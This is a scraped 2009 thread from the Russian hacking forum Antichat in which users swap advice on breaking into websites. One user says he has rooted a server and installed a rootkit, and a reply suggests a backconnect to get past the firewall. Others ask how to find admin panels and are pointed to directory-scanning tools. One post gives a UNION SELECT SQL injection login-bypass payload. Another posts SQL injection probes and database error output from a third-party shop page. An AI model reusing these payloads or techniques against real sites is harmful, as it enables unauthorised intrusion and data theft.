ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.09.2009, 06:36
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от warlok
поднял рута, заинсталил руткит (tuxkit)... пытаюсь подконектиться, фаер блочит тупо. что посоветуете? как от него избавиться?
Бэкконект, как вариант (если я правильно тебя понял)...
|
|
|
28.09.2009, 15:58
|
|
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983
Репутация:
39
|
|
подскажите при включеном листинге дирректорий только php файлы.
Можно как нибудь просмотреть их содержимое или на крайняк подключить в свой скрипт на locahost'e например?
Последний раз редактировалось crazy~driver; 28.09.2009 в 16:10..
|
|
|
|
28.09.2009, 16:04
|
|
Участник форума
Регистрация: 03.09.2009
Сообщений: 179
Провел на форуме:
1014907
Репутация:
90
|
|
ну если сервер не поддерживает php то их смотреть можно
|
|
|
|
28.09.2009, 16:14
|
|
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983
Репутация:
39
|
|
Сообщение от WNZRS
ну если сервер не поддерживает php то их смотреть можно
поянтно значит нельзя...
А подключить в свой скрипт, например, можно?
|
|
|
|
28.09.2009, 16:22
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 24
Провел на форуме:
48501
Репутация:
-4
|
|
Привет всем. какие есть способы найти админку сайта? есть ли праги или скрипты для этого? ну короче чё делать если стандартные типа /admin/index.php или /admin.php неподходят.
Ну или хотя бы список возможных путей в админку.
|
|
|
|
28.09.2009, 16:24
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от XXXXXX
Привет всем. какие есть способы найти админку сайта? есть ли праги или скрипты для этого? ну короче чё делать если стандартные типа /admin/index.php или /admin.php неподходят.
Ну или хотя бы список возможных путей в админку.
Ну во первых не /admin/index.php, а просто /admin/.
Во вторых сканеры ненайдут.
|
|
|
|
28.09.2009, 16:25
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от XXXXXX
Привет всем. какие есть способы найти админку сайта? есть ли праги или скрипты для этого? ну короче чё делать если стандартные типа /admin/index.php или /admin.php неподходят.
Ну или хотя бы список возможных путей в админку.
_http://security-digger.org/ , _http://forum.antichat.ru/thread40031.html
|
|
|
|
28.09.2009, 16:42
|
|
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983
Репутация:
39
|
|
Сообщение от XXXXXX
Привет всем. какие есть способы найти админку сайта? есть ли праги или скрипты для этого? ну короче чё делать если стандартные типа /admin/index.php или /admin.php неподходят.
Ну или хотя бы список возможных путей в админку.
попробуй прожкой site scanner она папки перебирает может че интересное найдешь
http://depositfiles.com/files/fbg1jvcpr
|
|
|
|
28.09.2009, 17:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от oRb
mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:
PHP код:
$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item = mysql_fetch_array($res);
if(md5($_POST['password']) == $item['password']) {
echo "LOGINED"!
} else {
echo "FAIL!";
}
Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.
Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty Как выяснилось, он проверяет еще и мыло. Я зарегался с мылом test@domain.com, паролем password. При вводе
Код:
test@domain.com
password
авторизация успешна, но при вводе
Код:
test@domain.com'#
password
пишет, что пароль неверный.. Значит никак не обойти?
|
|
|
|
28.09.2009, 17:13
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Такс вопрос
при '
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
/prod-detail.asp, line 26
вопрос как реализовывать дальше =\ копать как MSSQL? or MySQL?
http://wk/prod-detail.asp?ProductID=4429+or+0=(select%20id1)#
выдает
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]Unknown column 'id1' in 'field list' /prod-detail.asp, line 26
при
http://wk/prod-detail.asp?ProductID=4429+or+0=(select%20id)#
страница отображается
Последний раз редактировалось HAXTA4OK; 28.09.2009 в 17:19..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1554824){kind=avatar}
Похожие темы
Линейный вид
